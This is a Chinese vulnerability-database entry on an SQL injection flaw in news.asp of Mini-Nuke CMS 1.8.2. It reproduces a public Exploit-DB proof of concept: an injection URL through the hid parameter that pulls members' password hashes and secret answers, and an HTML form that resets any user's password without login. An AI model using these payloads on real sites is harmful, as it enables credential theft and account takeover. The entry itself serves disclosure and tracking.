发布时间 :2006-01-13 18:03:00
修订时间 :2017-07-19 21:29:32

[原文]SQL injection vulnerability in news.asp in Mini-Nuke CMS System 1.8.2 and earlier allows remote attackers to execute arbitrary SQL commands via the hid parameter.

[CNNVD]Mini-Nuke CMS System news.asp SQL注入漏洞(CNNVD-200601-130)

        Mini-Nuke CMS System 1.8.2及更早版本的news.asp中存在SQL注入漏洞,远程攻击者可以通过hid参数执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-89 [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  FULLDISC  20060112 Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection vulnerability
(VENDOR_ADVISORY)  BUGTRAQ  20060113 Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injectionvulnerability
(UNKNOWN)  XF  mininuke-news-sql-injection(24098)

- 漏洞信息

Mini-Nuke CMS System news.asp SQL注入漏洞
高危 SQL注入
2006-01-13 00:00:00 2006-05-02 00:00:00
        Mini-Nuke CMS System 1.8.2及更早版本的news.asp中存在SQL注入漏洞,远程攻击者可以通过hid参数执行任意SQL命令。

- 公告与补丁


- 漏洞信息 (1418)

MiniNuke <= 1.8.2 Multiple SQL Injection Vulnerabilities (EDBID:1418)
asp webapps
2006-01-14 Verified
0 nukedx
N/A [点击下载]
ICQ: 10072

Vendor: MiniNuke (
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp 
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery],sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52

Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar

Vendor: MiniNuke (
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without login.
HTML Example
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">&nbsp;&nbsp;
<input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr>

# [2006-01-14]

- 漏洞信息

Mini-NUKE news.asp hid Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Mini-NUKE contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the news.asp script not properly sanitizing user-supplied input to the 'hid' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2006-01-12 Unknow
2006-01-12 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者